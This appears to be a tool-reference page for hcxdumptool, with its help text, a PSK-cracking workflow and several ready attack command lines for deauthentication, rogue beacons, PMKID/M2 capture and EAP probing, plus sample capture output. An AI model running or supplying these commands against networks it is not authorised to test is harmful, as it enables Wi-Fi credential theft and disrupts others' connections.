hcxdumptool

hcxdumptool Description

A small tool for capturing packets from wireless network devices and detecting weaknesses in Wi-Fi networks (for example, PreSharedKey or PlainMasterKey are transmitted unencrypted by the CLIENT).

The pcapng capture format is compatible with Wireshark and tshark.

hcxdumptool is for analysis. This means everything is requested/saved by default. Unwanted information must be filtered later, offline.

Program features:

  • complete blocking of wlan traffic
  • can capture PMKIDs from access points (requires only one PMKID from access point) (use hcxpcapngtool to convert them to a format understandable by hashcat and/or JtR)
  • can capture handshakes from unconnected clients (requires only one single M2 from the client) (use hcxpcapngtool to convert them to a format understandable by hashcat and/or JtR)
  • can capture handshakes from 5/6 GHz clients on 2.4 GHz (requires only one single M2 from client) (use hcxpcapngtool to format to hashcat or JtR hash)
  • can capture passwords from wlan traffic (use hcxpcapngtool -E to save them to file along with network names)
  • can query and capture extended EAPOL (RADIUS, GSM-SIM, WPS) (hcxpcapngtool will show you info about them)
  • can collect IDs from wireless network traffic (for example: request IMSI numbers from mobile phones – use hcxpcapngtool -I to save them to a file)
  • can capture usernames from wlan traffic (eg: server authentication username – use hcxpcapngtool -U to save them to a file)

Homepage: https://github.com/ZerBea/hcxdumptool

Author: ZeroBeat

License: MIT

hcxdumptool Help

Usage:

hcxdumptool <options>

Options:

short options:
-i <interface> : interface (monitor mode will be enabled by hcxdumptool)
                 it is mandatory that the driver support ioctl() system calls, monitor mode and full packet injection!
-o <dump file> : output file in pcapng format, filename '-' outputs to stdout, '+' outputs to client
                 including radiotap header (LINKTYPE_IEEE802_11_RADIOTAP)
-f <frames>    : frames to save
                 bitmask:
                  0: clear default values
                  1: MANAGEMENT frames (default)
                  2: EAP and EAPOL frames (default)
                  4: IPV4 frames
                  8: IPV6 frames
                 16: WEP encrypted frames
                 32: WPA encrypted frames
                 64: vendor defined frames (AWDL)
                 to clear default values use -f 0 first, followed by desired frame type (e.g. -f 0 -f 4)
-c <digit>     : set frequency (2437,2462,5600,...) or channel (1,2,3, ...)
                 default: auto frequency/auto band
                 maximum entries: 255
                 0 - 1000 treated as channel
                   > 1000 treated as frequency in MHz
                 on 5GHz and 6Ghz it is recommended to use frequency instead of channel number
                 because channel numbers are not longer unique
                 standard 802.11 channels (depend on device, driver and world regulatory domain):
                 https://en.wikipedia.org/wiki/List_of_WLAN_channels
-s <digit>     : set predefined scanlist
                 0 = auto frequency/auto band (default)
                 1 = 1,6,11,3,5,1,6,11,2,4,1,6,11,7,9,1,6,11,8,10,1,6,11,12,13 (optimized 2.4GHz)
                 2 = 1,2,3,4,5,6,7,8,9,10,11,12,13 (standard 2.4 GHz)
                 3 = 36,40,44,48,52,56,60,64,100,104,108,112,116,120,124,128,132,136,140,144,149,153,157,161,165 (standard 5GHz)
                 4 = 1,2,3,4,5,6,7,8,9,10,11,12,13,36,40,44,48,52,56,60,64,100,104,108,112,116,120,124,128,132,136,140,144,149,153,157,161,165 (standard 2.4GHz/5GHz)
-t <seconds>   : stay time on frequency before hopping to the next channel
                 default 4 seconds
-m <interface> : set monitor mode by ioctl() system call and quit
-I             : show WLAN interfaces and quit
-C             : show available device channels and quit
                 if no frequencies are available, interface is probably in use or doesn't support monitor mode
                 if additional frequencies are available, firmware, driver and regulatory domain is probably patched
-h             : show this help
-v             : show version

long options:
--do_rcascan                       : show radio channel assignment (scan for target access points)
                                     this can be used to test that ioctl() calls and packet injection is working
                                     if you got no HIT, packet injection is possible not working
                                     also it can be used to get information about the target
                                     and to determine that the target is in range
                                     use this mode to collect data for the filter list
                                     run this mode at least for 2 minutes
                                     to save all received raw packets use option -o
                                     default scanlist: channel 1 ...13
--rcascan_max=digit>               : show only n highest ranking lines
                                     default: 256 lines
--rcascan_order=digit>             : rcascan sorting order:
                                      0 = sort by PROBERESPONSE count (default)
                                      1 = sort by BEACON count
                                      2 = sort by CHANNEL
--do_targetscan=<MAC_AP>           : same as do_rcascan - hide all networks, except target
                                     format: 112233445566, 11:22:33:44:55:66, 11-22-33-44-55-66
--reason_code=<digit>              : deauthentication reason code
                                      recommended codes:
                                      1 WLAN_REASON_UNSPECIFIED
                                      2 WLAN_REASON_PREV_AUTH_NOT_VALID
                                      4 WLAN_REASON_DISASSOC_DUE_TO_INACTIVITY
                                      5 WLAN_REASON_DISASSOC_AP_BUSY
                                      6 WLAN_REASON_CLASS2_FRAME_FROM_NONAUTH_STA
                                      7 WLAN_REASON_CLASS3_FRAME_FROM_NONASSOC_STA (default)
                                      9 WLAN_REASON_STA_REQ_ASSOC_WITHOUT_AUTH
--disable_client_attacks           : do not attack clients
                                     affected: ap-less (EAPOL 2/4 - M2) attack
--stop_client_m2_attacks=<digit>   : stop attacks against CLIENTS after 10 M2 frames received
                                     affected: ap-less (EAPOL 2/4 - M2) attack
                                     require hcxpcangtool --all option
--disable_ap_attacks               : do not attack access points
                                     affected: connected clients and client-less (PMKID) attack
--stop_ap_attacks=<digit>          : stop attacks against ACCESS POINTs if <n> BEACONs received
                                     default: stop after 600 BEACONs
--resume_ap_attacks=<digit>        : resume attacks against ACCESS POINTs after <n> BEACONs received
                                     default: 864000 BEACONs
--disable_deauthentication         : do not send deauthentication or disassociation frames
                                     affected: conntected clients
--silent                           : do not transmit!
                                     hcxdumptool is acting like a passive dumper
                                     expect possible packet loss
--eapoltimeout=<digit>             : set EAPOL TIMEOUT (microseconds)
                                     default: 20000 usec
--eapoleaptimeout=<digit>          : set EAPOL EAP TIMEOUT (microseconds) over entire request sequence
                                     default: 2500000 usec
--bpfc=<file>                      : input kernel space Berkeley Packet Filter (BPF) code
                                     affected: incoming and outgoing traffic - that include rca scan
                                     steps to create a BPF (it only has to be done once):
                                      set hcxdumptool monitormode
                                       $ hcxdumptool -m <interface>
                                      create BPF to protect a MAC
                                       $ tcpdump -i <interface> not wlan addr1 11:22:33:44:55:66 and not wlan addr2 11:22:33:44:55:66 -ddd > protect.bpf
                                       recommended to protect own devices
                                      or create BPF to attack a MAC
                                       $ tcpdump -i <interface> wlan addr1 11:22:33:44:55:66 or wlan addr2 11:22:33:44:55:66 -ddd > attack.bpf
                                       it is strongly recommended to allow all PROBEREQUEST frames (wlan_type mgt && wlan_subtype probe-req)
                                       see man pcap-filter for a list of all filter options
                                      to use the BPF code
                                       $ hcxdumptool -i <interface> --bpfc=attack.bpf ...
                                     notice: this is a protect/attack, a capture and a display filter
--filtermode=<digit>               : user space filter mode for filter list
                                     mandatory in combination with --filterlist_ap and/or --filterlist_client
                                     affected: only outgoing traffic
                                     notice: hcxdumptool act as passive dumper and it will capture the whole traffic on the channel
                                     0: ignore filter list (default)
                                     1: use filter list as protection list
                                        do not interact with ACCESS POINTs and CLIENTs from this list
                                     2: use filter list as target list
                                        only interact with ACCESS POINTs and CLIENTs from this list
                                        not recommended, because some useful frames could be filtered out
                                     using a filter list doesn't have an affect on rca scan
                                     only for testing useful - devices to be protected should be added to BPF
                                     notice: this filter option will let hcxdumptool protect or attack a target - it is neither a capture nor a display filter
--filterlist_ap=<file or MAC>      : ACCESS POINT MAC or MAC filter list
                                     format: 112233445566, 11:22:33:44:55:66, 11-22-33-44-55-66 # comment
                                     maximum entries 256
                                     run first --do_rcascan to retrieve information about the target
--filterlist_ap_vendor=<file>      : ACCESS POINT VENDOR  filter list by VENDOR
                                     format: 112233, 11:22:33, 11-22-33 # comment
                                     maximum entries 256
                                     run first --do_rcascan to retrieve information about the target
--filterlist_client=<file or MAC>  : CLIENT MAC or MAC filter list
                                     format: 112233445566, 11:22:33:44:55:66, 11-22-33-44-55-66 # comment
                                     maximum entries 256
                                     due to MAC randomization of the CLIENT, it does not always work!
--filterlist_client_VENDOR=<file>  : CLIENT VENDOR filter list
                                     format: 112233, 11:22:33, 11-22-33 # comment
                                     maximum entries 256
                                     due to MAC randomization of the CLIENT, it does not always work!
--weakcandidate=<password>         : use this pre shared key (8...63 characters) for weak candidate alert
                                     will be saved to pcapng to inform hcxpcaptool
                                     default: 12345678
--essidlist=<file>                 : transmit beacons from this ESSID list
                                     maximum total entries: 256 ESSIDs
--essidlist_wpaent=<file>          : transmit WPA-Enterprise-only beacons from this ESSID list
                                     maximum total entries: 256 ESSIDs
--active_beacon                    : transmit beacon from collected ESSIDs and from essidlist once every 10000000 nsec
                                     affected: ap-less
--flood_beacon                     : transmit beacon on every received beacon
                                     affected: ap-less
--all_m2                           : accept all connection attempts from a CLIENT
                                     affected: CLIENTs
                                     warning: that can prevent that a CLIENT can establish a connection to an assigned ACCESS POINT
--infinity                         : prevent that a CLIENT can establish a connection to an assigned ACCESS POINT
                                     affected: ACCESS POINTs and CLIENTs
--beaconparams=<TLVs>              : update or add Information Elements in all reactive and essidlist beacons
                                     maximum 50 IEs as TLV hex string, tag id 0 (ESSID) will be ignored, tag id 3 (channel) overwritten
                                     multiple IEs with same tag id are added, default IE is overwritten by the first
--wpaent                           : enable announcement of WPA-Enterprise in beacons and probe responses in addition to WPA-PSK
--eapreq=[:][:],...
                                     send max. 20 subsequent EAP requests after initial EAP ID request, hex string starting with EAP Type
                                     mode prefix determines layer the request is exclusively send on:
                                      T: = only if any TLS tunnel is up, ignored otherwise
                                     response is terminated with:
                                      :F = EAP Failure
                                      :S = EAP Success
                                      :I = EAP ERP Initiate
                                      :F = EAP ERP Finish
                                      :D = Deauthentication
                                      :T = TLS shutdown
                                      :- = no packet
                                     default behavior is terminating all responses with a EAP Failure, after last one the client is deauthenticated
--eapreq_follownak                 : jump to Auth Type requested by client in Legacy Nak response, if type available in remaining request sequence
--eaptlstun                        : activate TLS tunnel negotiation and Phase 2 EAP requests when requesting PEAP using --eapreq
                                     requires --eap_server_cert and --eap_server_key
--eap_server_cert=<server.pem>     : EAP TLS tunnel Server cert PEM file
--eap_server_key=<server.key>      : EAP TLS tunnel Server private key file
--use_gps_device=<device>          : use GPS device
                                     /dev/ttyACM0, /dev/ttyUSB0, ...
                                     NMEA 0183 $GPGGA $GPGGA
--use_gpsd                         : use GPSD device
                                     NMEA 0183 $GPGGA, $GPRMC
--nmea=<file>                      : save track to file
                                     format: NMEA 0183 $GPGGA, $GPRMC, $GPWPL
                                     to convert it to gpx, use GPSBabel:
                                     gpsbabel -i nmea -f hcxdumptool.nmea -o gpx -F file.gpx
                                     to display the track, open file.gpx with viking
--gpio_button=<digit>              : Raspberry Pi GPIO pin number of button (2...27)
                                     default = GPIO not in use
--gpio_statusled=<digit>           : Raspberry Pi GPIO number of status LED (2...27)
                                     default = GPIO not in use
--gpio_statusled_intervall=<digit> : Raspberry Pi GPIO LED flash intervall
                                     default = flash every 5 seconds
--tot=<digit>                      : enable timeout timer in minutes (minimum = 2 minutes)
                                     hcxdumptool will terminate if tot reached (EXIT code = 2)
                                     for a successful attack tot > 120 minutes recommended
--error_max=<digit>                : terminate hcxdumptool if error maximum reached
                                     default: 100 errors
--reboot                           : once hcxdumptool terminated, reboot system
--poweroff                         : once hcxdumptool terminated, power off system
--enable_status=<digit>            : enable real-time display (waterfall)
                                     only incoming traffic
                                     each message is displayed only once at the first occurrence to avoid spamming the real-time display
                                     bitmask:
                                         0: no status (default)
                                         1: EAPOL
                                         2: ASSOCIATION and REASSOCIATION
                                         4: AUTHENTICATION
                                         8: BEACON and PROBERESPONSE
                                        16: ROGUE AP
                                        32: GPS (once a minute)
                                        64: internal status (once a minute)
                                       128: run as server
                                       256: run as client
                                       512: EAP
                                      1024: EAP NAK
                                     characters < 0x20 && > 0x7e are replaced by .
                                     example: show everything but don't run as server or client (1+2+4+8+16 = 31)
                                              show only EAPOL and ASSOCIATION and REASSOCIATION (1+2 = 3)
--ip=<IP address>                  : define IP address for server / client (default: 224.0.0.255)
                                     multicast, localhost or client unicast IP address on both sides
--server_port=<digit>              : define port for server status output (1...65535)
                                   : default IP: 224.0.0.255
                                   : default port: 60123
--client_port=<digit>              : define port for client status read (1...65535)
                                     default IP: 224.0.0.255
                                     default port: 60123
--check_driver                     : run several tests to determine that driver support all(!) required ioctl() system calls
                                     the driver must support monitor mode and full packet injection
                                     otherwise hcxdumptool will not work as expected
--check_injection                  : run antenna test and packet injection test to determine that driver support full packet injection
                                     packet injection will not work as expected if the Wireless Regulatory Domain is unset
--force_interface                  : ignore all ioctl() warnings and error counter
                                     allow hcxdumptool to run on a virtual NETLINK monitor interface
                                     warning: packet injection and/or channel change may not work as expected
                                     you have been warned: do not report issues!
--example                          : show abbreviations and example command lines
--help                             : show this help
--version                          : show version

Recommended usage guidelines

Do not use a logical interface and leave the physical interface in managed mode.

Do not use hcxdumptool in combination with aircrack-ng, reaver, bully or other tools which takes access to the interface.

Stop all services which takes access to the physical interface (NetworkManager, wpa_supplicant,…).

Do not use tools like macchanger, as they are useless, because hcxdumptool uses its own random mac address space.

Work flow

The sequence of using the tools is as follows: hcxdumptoolhcxpcapngtoolhcxhashtool (additional hcxpsktool/hcxeiutool) → hashcat or JtR

  1. hcxdumptool: attack and capture everything (depending on options)
  2. hcxpcapngtool: convert everything
  3. hcxhashtool: filter hashes
  4. hcxpsktool: get weak PSK candidates
  5. hcxeiutool: calculate wordlists from ESSID
  6. hashcat or JtR: get PSK from hash

Recommendations

  • Make sure that the Wireless Regulatory Domain is not unset!
  • Run
sudo hcxdumptool -i interface --do_rcascan

for at least 30 seconds, to get information about the target!

  • Do not edit, merge or convert this pcapng files, because it will remove optional comment fields!
  • It is much better to run gzip to compress the files. Wireshark, tshark and hcxpcapngtool will understand this, as well as wpa-sec.stanev.org.
  • If hcxdumptool captured your password from WiFi traffic, you should check all your devices immediately!
  • If you use GPS, make sure GPS device is inserted and has a GPS FIX, before you start hcxdumptool!
  • Recommended tools to show additional 802.11 fields or to decrypt WiFi traffic: Wireshark and/or tshark
  • Recommended tool to convert hashes to formats that hashcat and JtR understand: hcxpcapngtool
  • Recommended tool to get possible PSKs from pcapng file: hcxpcapngtool
  • Important notice: Using filter options, could cause that some useful frames are filtered out! In that case hcxpcapngtool will show a warning that this frames are missing!
  • Use SIGHUB with care, because it will impact pselect()

Abbreviations

  • PMKIDROGUE = PMKID requested from ACCESS POINT by hcxdumptool
  • M1M2ROGUE = M2 requested from CLIENT by hcxdumptool
  • M1M2 = CHALLENGE MESSAGE PAIR
  • M2M3 = AUTHORIZED MESSAGE PAIR
  • M3M4 = AUTHORIZED MESSAGE PAIR
  • M1M4ZEROED = M4 SNONCE is zeroed and cannot be used to calculate MESSAGE PAIR
  • M3M4ZEROED = M4 SNONCE is zeroed and cannot be used to calculate MESSAGE PAIR
  • KDV0 = Key Descriptor Version 0 = Authentication Management Key defined
  • KDV1 = Key Descriptor Version 1 = WPA1 HMAC-MD5
  • KDV2 = Key Descriptor Version 2 = WPA2 HMAC-SHA1
  • KDV3 = Key Descriptor Version 3 = WPA2 AES-128-CMAC

hcxdumptool Usage Example

Use the wireless interface (-i wlp39s0f3u4u5), it will be automatically switched to monitor mode, save the captured frames to a pcapng file (-o output.pcapng), stay on each channel for 5 seconds (-t 5), show EAPOL messages and PROBEREQUEST/PROBERESPONSE (--enable_status=3):

sudo hcxdumptool -i wlp39s0f3u4u5 -o output.pcapng -t 5 --enable_status=3

Example output:

start capturing (stop with ctrl+c)
NMEA 0183 SENTENCE........: N/A
INTERFACE NAME............: wlp0s20f0u2
INTERFACE PROTOCOL........: IEEE 802.11
INTERFACE TX POWER........: 36 dBm (lowest value reported by the device)
INTERFACE HARDWARE MAC....: 00c0ca96cfcb (not used for the attack)
INTERFACE VIRTUAL MAC.....: 00c0ca96cfcb (not used for the attack)
DRIVER....................: ath9k_htc
DRIVER VERSION............: 5.16.8-arch1-1
DRIVER FIRMWARE VERSION...: 1.4
openSSL version...........: 1.1
ERRORMAX..................: 100 errors
BPF code blocks...........: 0
FILTERLIST ACCESS POINT...: 0 entries
FILTERLIST CLIENT.........: 0 entries
FILTERMODE................: unused
WEAK CANDIDATE............: 12345678
ESSID list................: 0 entries
ACCESS POINT (ROGUE)......: 000e1726743a (BROADCAST HIDDEN used for the attack)
ACCESS POINT (ROGUE)......: 000e1726743b (BROADCAST OPEN used for the attack)
ACCESS POINT (ROGUE)......: 000e1726743c (used for the attack and incremented on every new client)
CLIENT (ROGUE)............: b025aac62e0f
EAPOLTIMEOUT..............: 20000 usec
EAPOLEAPTIMEOUT...........: 2500000 usec
REPLAYCOUNT...............: 62969
ANONCE....................: 5630c66168cdb3f4a93da3509541b808afd72bf2e848576f822b8ddd3e6a1006
SNONCE....................: 3f4872fcafb3165345aa603842c7f01039763994419cbd80ada5fa239f7673bf

10:28:24 2412/1   ffffffffffff c891f9c7eff6 RT-728005 [BEACON]
10:28:24 2412/1   ffffffffffff 142e5e5636f0 RT-WiFi-36EE [BEACON]
10:28:24 2412/1   ffffffffffff e4186b1abe4c 114 [BEACON]
10:28:24 2412/1   ffffffffffff e8377a94a520 Keenetic-1606 [BEACON]
10:28:25 2412/1   7aa0dc189b9b c891f9c7eff6 RT-728005 [PROBERESPONSE]
10:28:25 2412/1   7aa0dc189b9b e4186b1abe4c 114 [PROBERESPONSE]
10:28:25 2412/1   ffffffffffff 6466b3489a20 TP-LINK_489A20 [BEACON]
10:28:26 2412/1   ffffffffffff f0b4d29f8889 DIR-615-8888 [BEACON]
10:28:26 2412/1   ffffffffffff bc0f9a24a294 DIR-615-A293 [BEACON]
10:28:28 2412/1   ffffffffffff 78321b502db0 DIR-615 [BEACON]
10:28:28 2412/1   b025aac62e0f c891f9c7eff6 RT-728005 [PMKIDROGUE:7a611b478d7ad30d13f884033de72a6d KDV:2]
10:28:33 2412/1   daa119a3ce9b 6466b3489a20 TP-LINK_489A20 [PROBERESPONSE]
10:28:36 2412/1   d8a98ba2e8f8 f0b4d29f8889 DIR-615-8888 [PROBERESPONSE]
10:28:39 2412/1   304a261d7203 bc0f9a24a294 DIR-615-A293 [PROBERESPONSE]
10:28:48 2412/1   52983911000d e8377a94a520 Keenetic-1606 [PROBERESPONSE]
10:28:52 2412/1   ffffffffffff 24d3f2aa99a5 RT-WiFi_66 [BEACON]
10:29:25 2412/1   4c6371e0e52e 142e5e5636f0 RT-WiFi-36EE [PROBERESPONSE]
10:29:42 2412/1   d8c0a6b19e25 78321b503d48 DIR-615-3D47 [PROBERESPONSE]
10:30:00 2417/2   ffffffffffff d8af817653ce RT-WiFi-53CD [BEACON]
10:30:00 2417/2   ffffffffffff ec43f6dc7d68 Jenechka [BEACON]
10:30:00 2417/2   ffffffffffff 045ea4543b86 [HIDDEN BEACON]
10:30:02 2417/2   402f86f57436 ec43f6dc7d68 Jenechka [PROBERESPONSE]
10:30:08 2417/2   304a261d7203 d8af817653ce RT-WiFi-53CD [PROBERESPONSE]
10:30:11 2417/2   ffffffffffff c471544fbb30 TP-LINK_BB30 [BEACON]
10:30:26 2417/2   9444443388b6 000e1726743e Moto G (5S) Plus 110282 [AUTHENTICATION]
10:30:26 2417/2   9444443388b6 000e1726743e Moto G (5S) Plus 110282 [ASSOCIATION]
10:30:44 2417/2   9444443388b6 000e1726743e Moto G (5S) Plus 110282 [REASSOCIATION]
10:30:57 2417/2   ffffffffffff f8f082b2d0df trytek_76 [BEACON]
10:31:47 2417/2   008e7af12a6e 000e1726743f RT-104 [AUTHENTICATION]
10:31:47 2417/2   008e7af12a6e 000e1726743f RT-104 [ASSOCIATION]
10:31:47 2417/2   008e7af12a6e 000e1726743f RT-104 [EAPOL:M1M2ROGUE EAPOLTIME:169 RC:62969 KDV:2]
10:31:57 2417/2   586356f41838 c471544fbb30 TP-LINK_BB30 [PROBERESPONSE]
10:32:00 2422/3   ffffffffffff f81a67494462 Old'est_WEB [BEACON]
10:32:05 2422/3   daa119f66eb6 e865d48431c1 Tenda_8431C0 [PROBERESPONSE]

Modified Raspberry Pi, aggressive mode with deauthentication (default), mobile (fast switching between channels, this is the default), targets APs (default) and CLIENTS (--active_beacon):

sudo hcxdumptool --gpio_button=4 --gpio_statusled=17 -i wlan0 -o dump.pcapng --poweroff --stop_ap_attacks=6000 --resume_ap_attacks=12000 --bpfc=own.bpfc --essidlist=beaconlist --active_beacon

Modified Raspberry Pi, stationary (long switching between channels “-t 120”), targets CLIENTS (--disable_deauthentication --disable_ap_attacks --active_beacon):

sudo hcxdumptool --gpio_button=4 --gpio_statusled=17 -i wlan0 -o dump.pcapng --tot=1440 --bpfc=own.bpfc --disable_deauthentication --disable_ap_attacks --active_beacon -c 1,3,5,7,9,11,2,4,6,8,10 -t 120

Client-only EAP probing attack using tunneled PEAP sequence MS-CHAP-V2, EAP-MD5, GTC:

sudo hcxdumptool -i wlan0 -t 120 -o dump.pcapng --enable_status=1567 --disable_deauthentication --disable_ap_attacks --wpaent --eaptlstun --eap_server_cert=server.crt --eap_server_key=server.key --eapreq=1921:-,T:1a0104001610000102030405060708090a0b0c0d0e0f20:-,T:04010020:-,T:06:-

How to install hcxdumptool

Installation on Kali Linux

sudo apt install hcxdumptool

Installation on BlackArch

sudo pacman -S hcxdumptool

Installation on Debian, Linux Mint, Ubuntu and their derivatives

sudo apt install libssl1.1 libssl-dev git
git clone  https://github.com/ZerBea/hcxdumptool
cd hcxdumptool/
make
sudo make install

hcxdumptool Screenshots

hcxdumptool Tutorials

Related tools

Recommended for you:

Comments are Closed

Рейтинг@Mail.ru